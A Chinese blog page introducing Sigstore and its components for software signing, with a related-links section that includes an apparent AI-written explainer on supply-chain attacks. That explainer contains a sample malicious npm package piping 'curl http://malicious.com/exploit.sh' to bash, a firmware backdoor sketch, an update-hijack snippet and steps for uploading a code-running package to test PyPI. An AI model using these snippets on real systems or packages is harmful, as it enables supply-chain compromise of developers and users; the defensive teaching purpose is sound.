软件供应链安全之Sigstore

最新推荐文章于 2025-06-30 08:04:37 发布
最新推荐文章于 2025-06-30 08:04:37 发布
阅读量308 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 安全
原文链接:https://mp.weixin.qq.com/s/mb0v7HblVlZEYWSYWgDTog
Sigstore是一个由多家知名公司支持的Linux基金会项目,旨在通过自动密钥管理和透明日志技术简化加密软件签名过程,增强开源软件供应链的安全性。该项目包含Cosign、Fulcio和Rekor等组件,能够实现软件从开发到发布的全过程加签和验签。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

近几年关于供应链安全领域的攻击数不胜数,其中著名的有 Microsoft Exchange Server、Colonial pipeline 和 SolarWinds breach。在 SolarWinds 攻击之前,识别依赖关系中的威胁约束在开发人员身上,每个人都控制着自己的模块,并根据现有的供应链做出验证。SolarWinds 攻击让安全人员了解到供应链安全不仅需要扫描项目的依赖项,还需要扫描之前所有内容(依赖的依赖)以确保所有内容的真实性和安全性。

一、什么是Sigstore

供应链安全的一个关键部分就是软件的完整性和真实性,即部署到生产中的软件未被篡改且来自有效来源。这种首先是在构建软件后对软件进行签名,然后在部署前对生成的签名进行验证来实现的。Sigstore 是一个由谷歌、红帽、Chainguard、普渡大学、VMware、Twitter、Citi、Charm、Anchore 和 Iron Bank共同支持的 Linux 基金会项目,所有开发人员和软件提供商都可以免费使用。Sigstore 的代码和操作工具是 100% 开源的,目的是为了简化加密软件签名的使用以此来改善开源软件供应链。在软件的开发到发布的整个过程中,对其做到加签和验签不是一件简单的事,尤其是对于非安全人员和现有工具(如 PGP)的用户体验来说,还有很多不足之处(如密钥管理),而 Sigstore 很好地解决了这一难点。

使用 Sigstore 对工件进行签名的开源和闭源软件图

二、Sigstore特点

1、自动密钥管理:使用 Cosign 来生成签名和验证工件所需的密钥对,尽可能自动化,使用者无须维护管理密钥。

2、透明日志技术:基于 RFC 3161协议的防篡改日志来实现透明日志,通过透明日志可以找到并验证签名,还可以检查是否有人更改了源代码、构建平台或工件存储库。

Sigstore 不仅是一个工具或软件,还是简化软件签名和透明度的项目集合,其主要组件包括:

(1)Cosign(容器签名、验证和存储),其职责是签署容器并将信息发布到 OCI 注册中心。

(2)Fulcio(根证书颁发机构),其工作是颁发代码签名证书并将 OIDC 身份嵌入到代码签名证书中。

(3)Rekor(透明日志),其是附加的、不可变的分类账,作为由谁签署的内容的透明真实来源,类似区块链技术。

(4)OpenID Connect(认证方式),作为一个身份层,用于检查真实性,同时允许客户端请求和接收有关经过身份验证的会话和用户的信息。

三、Sigstore工作原理流程

1、cosign 在内存中生成一个临时公钥/私钥对。

2、用户通过 Google 或 GitHub 等 OpenID Connect (OIDC) 提供商进行身份验证,验证电子邮件地址的所有权和先前生成的密钥的所有权。

3、如果身份验证成功,用户将收到代码签名证书。

4、代码签名证书发布到透明日志,以便其他人验证。

5、用户使用代码签名证书及其密钥对工件进行签名。

6、来自工件的签名被发布到透明日志。

7、用于创建签名的短期代码签名凭证被销毁。

8、可以发布已签名的工件(例如,在容器注册表上)。

四、总结

Sigstore 是实现 SLSA 2级标准的关键项目,也是实现 SLSA 3级标准的开端。2021年初,Kubernetes 团队开始探索 SLSA 合规性,以提高 Kubernetes 软件供应链的安全性,并且发布 Kubernetes 1.24 以及所有未来的版本都将包括加密签名的 Sigstore 证书。

注:SLSA 是一个安全框架,一个标准和控制清单,用于防止篡改、提高完整性以及保护项目、业务或企业中的包和基础设施。分为以下四级:

现阶段 Sigstore 实现了自动化对组件进行数字签名和验证的能力,解决了相关信任难点如透明日志、私钥管理等。随着云原生技术的发展以及行业对供应链安全的重视,Sigstore 将会成为新的行业标准。

andre1918
关注
Sigstore:保护软件完整性的网络安全方案
IiwEngine的博客
09-20 639
Sigstore是一个开源项目,旨在提供一个安全的软件签名和透明度平台,以验证软件包的真实性和完整性。Sigstore的目标是建立一个可信任的软件生态系统,使用户能够验证软件包的来源、确保软件包未被篡改,并追溯其历史记录。通过数字签名和透明度日志,Sigstore提供了一种可靠的方式来验证软件包的来源和完整性。它提供了一种简单而有效的方式来验证软件包的来源和完整性,防止恶意软件和数据篡改的风险。通过建立一个可信任的软件生态系统,Sigstore有助于提高软件供应链安全性,并增强用户对软件的信任。
智能汽车行业软件供应链安全威胁与解决方案分享——小米IoT安全峰会
murphysec的博客
08-08 2731
关于软件供应链安全,整体认为是处在一个风险和关注度都比较高的状态。可预见的是在接下来的一段时间风险还会持续。想要高效的去解决这些风险,核心依赖的是能够支撑各个场景的这种检测和修复的工具,以及说像漏洞组件这样丰富的知识库数据。在 IOT 领域,尤其需要关注风险的前置解决,否则整个治理的效果效率会比较低,成本也会比较高。...
软件完整性保护方案之Sigstore
murphysec的博客
05-18 1102
背景 SolarWinds Orion 软件更新包在2020年底被黑客植入后门,此次攻击事件波及范围极大,包括美国政府部门、关键基础设施以及多家全球500强企业,影响难以估计。如果用户能确认软件来源是可信的 SolarWinds 官方,这次事件可能可以避免。 为了确认软件的来源和构建方式,实现完整性保护,Linux基金会联合Red Hat、Google 和 Purdue 在 2021年3月推出了 Sigstore 代码签名项目,该项目致力于让开发人员签署发布时无感和让用户轻松验证。 Sigstore 在发布
保密+完整+可用+安全,规避代码安全「马奇诺防线」,构建软件供应链整体安全
GitLab 中国发行版
05-18 1278
3大阶段 + 4 大要点,打造软件供应链整体安全
推荐开源项目:Sigstore Framework —— 安全签名框架的基石
gitblog_00654的博客
08-07 964
推荐开源项目:Sigstore Framework —— 安全签名框架的基石 Sigstore 是一个开放源代码项目,致力于提供一套工具和基础设施,以增强软件供应链安全性。其核心框架 sigstore/sigstore 集成了共享代码,包括基础设施组件(如 Fulcio 和 Rekor)以及 Go 语言客户端(如 Cosign 和 Gitsign)。这个强大的库为开发者提供了多样化的签名接口和身...
谷歌Linux基金会等联合推出开源软件签名服务 sigstore,提振软件供应链安全
smellycat000的专栏
03-10 552
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队今天,谷歌发布博客文章,宣布和Linux 基金会、Red Hat以及普渡大学共同推出 sigstore 项目。该项目通过改进软...
OSCS-软件供应链安全威胁与业界解决方案
OSCS开源安全社区
06-02 2025
提到这个话题,其实它的背后是整个软件的发展,以及整个开源生态的发展,包括像云原生以及低代码这些新技术的发展,我们可以发现软件的开发越来越像是一个在搭积木的过程。这些积木,其实就是这些开源组件、开源软件。有机构调研显示说,在2015年到2019年之间,整个开源代码在项目代码里面使用的占比是翻了一倍的,直到今天,它大概是到了78%的一个水平。从上边的这一组数据来看,每个项目里面引入的开源组件可能会超过一百多个,这里面有28%都是有漏洞缺陷的。同时呢,这些有漏洞的组件,它不止存在一个漏洞,平均是两个三个漏洞,
防患于未然 - 软件供应链安全
最新发布
weixin_42587823的博客
06-30 645
《防患于未然:软件供应链安全实践》探讨了如何在现代开发流程中构建自动化安全防线。文章提出三道关键防护:1)使用Dependabot等工具自动化扫描依赖漏洞;2)在CI中集成Trivy进行容器镜像扫描,阻止高危漏洞进入制品库;3)通过Sigstore/Cosign实现制品数字签名,确保来源可信。这些措施体现了"安全左移"理念,将防护前移至开发流程上游。文章强调自动化安全检查的必要性,同时提醒在安全与效率间保持平衡,主张平台团队应承担安全基础设施建设的责任,为开发者提供"默认安全&
谈谈我对云原生与软件供应链安全的思考
阿里巴巴中间件
07-07 795
2011 年,互联网技术先驱 Marc Andreessen 宣称,软件正在吞噬世界(Software is eating the world)。由软件驱动的行业创新正在颠覆着传统业务模式,推动着全球经济实现数字化连接。随着互联网的快速发展,数字化转型已经成为每一个企业的关键战略。但是现代软件开发涉及到多方协作,大量应用依赖开源代码或者三方组件。在上游开源软件的安全问题会...
Linux 基金会成立新的安全供应链签名项目Sigstore;等开源之道每周评论 2021 03 16
johnwoo_lee的专栏
03-16 227
点击蓝字 关注开源之道开源软件如何助力数字化创新;中国的巨头们正在开源上努力赶超;Jupyter 革新了数据科学;开源安全基金会喜迎新会员;参与 GSoC 2021 的开源项目超过200个...
sigstore:签名原型
04-03
sigstore签名CLI工具 :warning: 尚未准备好使用! sigstore CLI是用于签名blob,tarball等并使用sigstore签名基础结构建立信任根的通用工具 对于集装箱签名,你想
sigstore-git-verifier:Github操作以验证sigstore透明日志中是否存在所有提交
03-30
sigstore-git-verifier Github操作以验证sigstore透明日志中是否存在所有提交
Sigstore 开源项目安装与使用指南
gitblog_00700的博客
08-07 907
Sigstore 开源项目安装与使用指南 sigstoreCommon go library shared across sigstore services and clients项目地址:https://gitcode.com/gh_mirrors/si/sigstore 一、项目介绍 Sigstore 是一个开源项目,致力于软件供应链安全,它通过提供一系列工具和服务来帮助开发者确保其软件在构...
【亲测免费】 Sigstore 开源项目安装与使用指南
gitblog_01114的博客
08-07 1063
Sigstore 开源项目安装与使用指南 1. 项目目录结构及介绍 Sigstore 是一个专注于软件供应链安全的项目,它提供了一套工具来确保容器和二进制文件的签名验证。由于我们无法直接访问仓库最新的内部目录结构,通常开源项目的目录布局可能包括以下组成部分: src: 包含主要的源代码文件,根据不同语言(如Go, Python, Rust)组织。 cmd: 若存在,可能存储不同命令行工具的入口点...
K8S 生态周报| Sigstore 正式 GA
k8s 生态
10-31 263
“「K8S 生态周报」内容主要包含我所接触到的 K8S 生态相关的每周值得推荐的一些信息。欢迎订阅知乎专栏「k8s生态」[1]。”大家好,我是张晋涛。本周 KubeCon + CloudNativeCon North America 2022 已经结束,看 timeline 有了一种几乎所有人都去参加的错觉, 大概也是受近几年各类因素的影响,很多人也都没有线下聚会之类的。在这次大会上,有很多有意思...
二、python安装简单介绍
Gogh的博客
11-15 2124
Python环境  安装Python windows: 1 2 3 4 5 6 7 1、下载安装包     https://www.python.org/downloads/ 2、安装     默认安装路径:C:\python27 3、配置环境变量     【右键计算机】--》【属性】--》【高级系统设置】--》【高级】--
cosign使用实践(一)本地验证二进制与镜像
zishen的专栏
05-04 2512
cosign使用实践,github镜像推送
Sigstore 开源项目常见问题解决方案
gitblog_00117的博客
12-10 677
Sigstore 开源项目常见问题解决方案 项目基础介绍 Sigstore 是一个旨在提高软件供应链安全性的开源项目。它提供了一种简便的方式,通过为软件 artifact 签名和验证签名来确保其完整性和来源。Sigstore 项目包含了一组共享的 Go 语言库,这些库被 Sigstore 的基础设施(如 Fulcio 和 Rekor)以及 Go 语言客户端(如 Cosign 和 Gitsign)所...
大数据团队必备的最佳提效工具推荐
小明的Java问道之路
10-15 2624
本文介绍了一些笔者认为十分有效地,并且在大数据以及相关的运维开发团队以及中小企业可以降本增效的工具,同时也是建议大家去学习的一些可以在工作面试中加分的工具。诸如TDSQL-C腾讯云分布式数据库等等工具可以多深入了解一下,欢迎大家进一步的来学习。
供应链攻击?是怎么实现啊
03-08
<think>好的,用户之前询问了关于在电脑启动时植入shellcode的可能性,现在他们又转向供应链攻击,想知道这是怎么实现的。我需要先理解供应链攻击的基本概念,然后结合他们之前的兴趣点来构建回答。 首先,用户可能对系统底层安全感兴趣,比如启动过程的安全机制,现在想了解更广泛的攻击方式。供应链攻击属于更高级、更隐蔽的攻击手段,可能涉及多个环节,我需要用他们能理解的例子来解释。 供应链攻击的实现方式包括污染软件依赖、篡改硬件设备、入侵开发环境等。需要具体说明每个步骤,比如攻击者如何渗透到开发环节,如何注入恶意代码,以及这些代码如何传播到最终用户。可能还需要提到一些著名案例,比如SolarWinds事件,让用户有更直观的认识。 用户可能还想知道这种攻击的危害性和防御方法,所以在回答中需要涵盖这些方面。考虑到他们之前的问题涉及启动过程,可以关联供应链攻击如何绕过Secure Boot等安全机制,比如通过签名的恶意软件更新。 另外,要确保回答结构清晰,分点说明,使用技术术语但不过于复杂。可能需要使用代码示例或图表来辅助解释,比如如何劫持npm包或篡改固件更新。同时,提醒用户注意供应链安全的重要性,尤其是开发者和企业如何防范此类攻击。 最后,用户可能有学习或研究的目的,所以可以推荐一些进一步学习的资源或实践方法,比如安全审计工具或参加CTF比赛中的相关挑战。需要保持语气专业但易于理解,避免过于技术化,确保信息准确可靠。</think>### 供应链攻击深度解析 --- #### 一、攻击本质 **通过渗透产品/服务生产流程中的任意环节**,将恶意代码注入合法渠道,形成**"官方带毒"传播链**。攻击目标包括: - 软件开发工具链(编译器、依赖库) - 硬件制造流程(芯片烧录、固件更新) - 物流运输环节(植入硬件后门) - 软件分发渠道(应用商店、镜像源) --- #### 二、典型攻击路径(技术实现) ##### 1. 软件供应链污染 ```mermaid graph LR A[攻击者入侵代码仓库] --> B{污染依赖项} B -->|npm包劫持| C[自动更新传播] B -->|PyPI投毒| D[开发者本地环境感染] C & D --> E[用户安装"合法"软件] ``` **具体实现**: - **依赖库劫持**(如`event-stream`事件): ```javascript // 恶意npm包伪代码 module.exports = function(){ require('child_process').exec('curl http://malicious.com/exploit.sh | bash') } ``` - **开发工具链污染**(如XcodeGhost): ```bash # 篡改Xcode编译流程 /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/clang -malicious_flag ``` ##### 2. 硬件供应链攻击 ```python # 模拟UEFI固件更新植入后门(需物理接触产线) def flash_firmware(image): original = read_rom() backdoor = generate_malicious_module() infected_image = original.replace(b"ACPI_TABLE", backdoor + b"ACPI_TABLE") write_to_spi_flash(infected_image) ``` ##### 3. 更新劫持(如SolarWinds攻击) ```powershell # 恶意更新包执行流程 $updateFile = Download-Update -Url "https://official-update.com/v3.2.1" $signature = Verify-Signature -File $updateFile # 合法数字签名 iex ($updateFile | Extract-MaliciousDLL) ``` --- #### 三、技术突破点 | 攻击阶段 | 利用技术 | 典型案例 | |------------------|-----------------------------------|--------------------------| | 开发环境 | CI/CD配置泄露 | Codecov Bash Uploader | | 编译过程 | 编译器后门(可执行文件污染) | Ken Thompson经典论文实例 | | 软件分发 | 镜像源劫持(APT/Yum源投毒) | 某Linux发行版镜像被篡改 | | 硬件生产 | 固件签名密钥泄露 | 某品牌服务器植入BMC后门 | --- #### 四、防御技术对抗 ##### 1. 软件成分分析(SCA) ```bash # 使用Syft扫描容器镜像成分 syft alpine:latest -o json | jq '.artifacts[] | select(.name == "malicious-pkg")' ``` ##### 2. 硬件可信验证 ```text Intel SGX远程认证流程: 1. 生成硬件Quote → 2. 发送至IAS服务 → 3. 验证TEE环境完整性 ``` ##### 3. 分布式验证策略 ```go // TUF框架元数据签名验证示例 func VerifyUpdate(meta Metadata) bool { rootKeys := LoadTrustedRootKeys() return meta.Signatures.Verify(rootKeys) && HashMatch(meta.Targets["app.exe"], repo.Targets["app.exe"]) } ``` --- #### 五、攻击检测难点 1. **信任链污染**:恶意代码携带合法数字签名 ```powershell # 验证微软签名但实际为恶意驱动 Get-AuthenticodeSignature "C:\drivers\evil.sys" | Where Status -eq "Valid" ``` 2. **潜伏周期长**:SolarWinds攻击潜伏期达**14个月** 3. **跨环节渗透**:某次攻击同时污染了: - Jenkins构建服务器 - SonarQube代码分析平台 - 内部PyPI私有仓库 --- #### 六、企业级防护方案 **分层防御架构**: ```text 1. 硬件层:TPM 2.0 + Secure Boot 2. 构建层:隔离的Air-Gapped编译环境 3. 交付层:基于Sigstore的透明日志签名 4. 运行时:eBPF实时监控异常行为 ``` **关键工具链**: - **Grafeas**:元数据审计系统 - **in-toto**:供应链链路验证框架 - **SPDX**:软件物料清单标准 --- #### 七、研究实验建议 1. **模拟攻击实验**: ```bash # 创建恶意Python包实验 poetry new demo-pkg echo "import os; os.system('calc.exe')" > demo-pkg/__init__.py twine upload --repository-url https://test.pypi.org/legacy/ dist/* ``` 2. **防御实践**: ```dockerfile # 安全基础镜像构建 FROM scratch COPY --from=gcr.io/distroless/base / / ADD --chown=nonroot:nonroot app /app USER nonroot ``` --- ### 总结 供应链攻击本质是**信任传递体系的瓦解**,其技术实现高度依赖对生产流程的深度渗透。现代防御需要建立**零信任供应链体系**,通过**自动化审计+多方验证+最小化依赖**来构建深度防御。对于开发者而言,永远不要盲目信任`pip install`或`npm install`的输出结果。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值